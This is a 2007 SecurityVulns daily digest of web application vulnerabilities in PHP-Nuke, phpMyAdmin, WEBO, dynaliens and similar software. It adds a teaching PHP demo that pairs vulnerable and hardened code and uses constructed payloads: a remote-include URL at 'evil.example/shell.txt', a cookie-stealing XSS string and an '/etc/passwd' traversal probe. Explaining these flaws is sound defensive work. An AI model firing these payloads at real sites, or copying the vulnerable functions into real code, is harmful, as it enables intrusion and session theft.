Computer Security


Daily web application security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published: 09.03.2007
Source:
SecurityVulns ID: 7361
Type: remote
Threat Level: 5/10
Description: PHP file inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
Affected: WORDPRESS : WordPress 2.1
 PHPNUKE : PHP-Nuke 8.0
 WEBO : Web Organizer 1.0
 PHPMYADMIN : phpMyAdmin 2.10
 DYNALIENS : dynaliens 2.1
CVE: CVE-2007-1520 (The cross-site request forgery (CSRF) protection in PHP-Nuke 8.0 and earlier does not ensure the SERVER superglobal is an array before validating the HTTP_REFERER, which allows remote attackers to conduct CSRF attacks.)
 CVE-2007-1519 (Cross-site scripting (XSS) vulnerability in modules.php in PHP-Nuke 8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search operation in the Downloads module, a different product than CVE-2006-3948.)
 CVE-2007-1416 (PHP remote file inclusion vulnerability in createurl.php in JCcorp (aka James Coyle) URLshrink allows remote attackers to execute arbitrary PHP code via a URL in the formurl parameter.)
 CVE-2007-1414 (Multiple PHP remote file inclusion vulnerabilities in Coppermine Photo Gallery (CPG) allow remote attackers to execute arbitrary PHP code via a URL in the (1) cmd parameter to (a) image_processor.php or (b) picmgmt.inc.php, or the (2) path parameter to (c) include/functions.php, (d) include/plugin_api.inc.php, (e) index.php, or (f) pluginmgr.php.)
 CVE-2007-1395 (Incomplete blacklist vulnerability in index.php in phpMyAdmin 2.8.0 through 2.9.2 allows remote attackers to conduct cross-site scripting (XSS) attacks by injecting arbitrary JavaScript or HTML in a (1) db or (2) table parameter value followed by an uppercase </SCRIPT> end tag, which bypasses the protection against lowercase </script>.)
 CVE-2007-1391 (PHP remote file inclusion vulnerability in modules/abook/foldertree.php in Leo West WEBO (aka weborganizer) 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter.)
 CVE-2007-1390 (Multiple cross-site scripting (XSS) vulnerabilities in dynaliens 2.0 and 2.1 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) recherche.php3 or (2) ajouter.php3.)
 CVE-2007-1389 (dynaliens 2.0 and 2.1 allows remote attackers to bypass authentication and perform certain privileged actions via a direct request for (1) validlien.php3 (2) supprlien.php3 (3) supprub.php3 (4) validlien.php3 (5) confsuppr.php3 (6) modiflien.php3, or (7) confmodif.php3 in admin/.)
 CVE-2007-1325 (The PMA_ArrayWalkRecursive function in libraries/common.lib.php in phpMyAdmin before 2.10.0.2 does not limit recursion on arrays provided by users, which allows context-dependent attackers to cause a denial of service (web server crash) via an array with many dimensions. NOTE: it could be argued that this vulnerability is caused by a problem in PHP (CVE-2006-1549) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in phpMyAdmin.)
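Three of the bug classes in the CVE entries above, shown side by side with a hardened form, as an added PHP example. This is not code from SecurityVulns or from any of the affected projects: the function names, the module map, the file names and the attacker payloads are constructed for the demo. It runs offline from the command line with `php`.

```php
<?php
// Added example, not code from SecurityVulns or from any of the listed projects.
// It reproduces three bug classes from the CVE list above on constructed input:
// remote file inclusion through a path parameter (CVE-2007-1391/-1414/-1416 pattern),
// a case-sensitive </script> blacklist (CVE-2007-1395 pattern), and unbounded
// recursion over a user-supplied array (CVE-2007-1325 pattern). Function names,
// file names and the 'module' map are assumptions chosen for the demo.

// 1. Remote file inclusion: a request parameter is used as the directory prefix
//    of include(). On PHP 4 / PHP < 5.2 include() honours allow_url_fopen, so
//    baseDir=http://attacker/ makes it fetch and execute attacker-controlled PHP;
//    from PHP 5.2 on it additionally needs allow_url_include=On. Only the path
//    that would be included is returned here, so the demo runs offline.
function vulnerableIncludePath(string $baseDir): string {
    return $baseDir . '/modules/abook/foldertree.inc.php';
}

// Hardened: the request may only select a key of a fixed map; anything else is refused.
function safeIncludePath(string $module): ?string {
    $allowed = [
        'abook'    => __DIR__ . '/modules/abook/foldertree.inc.php',
        'calendar' => __DIR__ . '/modules/calendar/tree.inc.php',
    ];
    return $allowed[$module] ?? null;
}

// 2. Incomplete blacklist: only the lowercase closing tag is stripped, so </SCRIPT>
//    (or </Script>) survives and the browser still closes the script element.
function incompleteBlacklist(string $value): string {
    return str_replace('</script>', '', $value);
}

// Hardened: encode for the HTML text context instead of hunting for known-bad strings.
function encodeForHtml(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 3. Unbounded recursion: a walker that descends as deep as the caller's array goes,
//    one stack frame per level, with no limit.
function walkUnbounded(array $arr, callable $fn): void {
    foreach ($arr as $k => $v) {
        is_array($v) ? walkUnbounded($v, $fn) : $fn($k, $v);
    }
}

// Hardened: carry a depth counter and refuse input nested deeper than a small limit.
// (PHP's own max_input_nesting_level, default 64, bounds what $_GET/$_POST can hold,
// but arrays built elsewhere from user data still need their own bound.)
function walkBounded(array $arr, callable $fn, int $maxDepth = 32, int $depth = 0): bool {
    if ($depth > $maxDepth) {
        return false;                       // too deep: reject instead of recursing on
    }
    foreach ($arr as $k => $v) {
        if (is_array($v)) {
            if (!walkBounded($v, $fn, $maxDepth, $depth + 1)) {
                return false;
            }
        } else {
            $fn($k, $v);
        }
    }
    return true;
}

// --- demo on constructed attacker input ---
$attackerBase = 'http://evil.example/shell.txt?';            // constructed RFI payload
echo "vulnerable include target: ", vulnerableIncludePath($attackerBase), "\n";
var_dump(safeIncludePath('../../etc/passwd'));                // NULL: not in the map
var_dump(safeIncludePath('abook') !== null);                  // bool(true)

$xss = '</SCRIPT><script>alert(document.cookie)</script>';    // constructed XSS payload
echo "blacklist output: ", incompleteBlacklist($xss), "\n";   // </SCRIPT> still present
echo "encoded output:   ", encodeForHtml($xss), "\n";         // no live tags remain

$deep = 'leaf';                                               // constructed 5000-level array
for ($i = 0; $i < 5000; $i++) {
    $deep = [$deep];
}
$count = 0;
$tally = function ($k, $v) use (&$count) { $count++; };
var_dump(walkBounded($deep, $tally));                         // bool(false): rejected at depth 33
var_dump(walkBounded(['a' => ['b' => 1, 'c' => 2]], $tally), $count); // bool(true), int(2)
// walkUnbounded($deep, $tally) would instead recurse once per level; make the array
// deep enough and the process exhausts its stack, which is the crash the CVE describes.
```

The allowlist map is the important design choice for the inclusion case: validating the string (stripping `http://`, checking for `..`) keeps the attacker's input on the path to `include()`, whereas a map lets the request pick only a key and never a path. The same reasoning applies to the XSS case: encoding every output for its context needs no knowledge of which tags are dangerous, so there is nothing for an uppercase variant to bypass.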
Original documents:
 RaeD Hasadya, Remote File Include In Script Coppermine Photo Gallery (09.03.2007)
 c_r_ck_(at)_hotmail.com, Lazarus Guestbook (admin.php) Remote File Include Exploit (09.03.2007)
 sn0oPy.team_(at)_gmail.com, dynaliens v2.0/v2.1 bypass admin authentication + XSS (09.03.2007)
 alfa_(at)_virtuax.be, xss in phpmyadmin >=2.8.0 and < 2.10.0 (09.03.2007)
 r00t2000_(at)_hush.com, Word Press Sensitive Directory exposure (SQL) (09.03.2007)
 RaeD Hasadya, Remote File Include In Script copyright (c) James Coyle; JCcorp (09.03.2007)
 erdc_(at)_echo.or.id, [ECHO_ADV_67$2007] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vulnerability (09.03.2007)
 RaeD Hasadya, XSS In Script deviantART (09.03.2007)
 Omid, Sql injection in WordPress 2.1.2 (09.03.2007)
 ascii, Php Nuke POST XSS on steroids (09.03.2007)
Files: PHP-Nuke POST cross-site scripting PoC

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod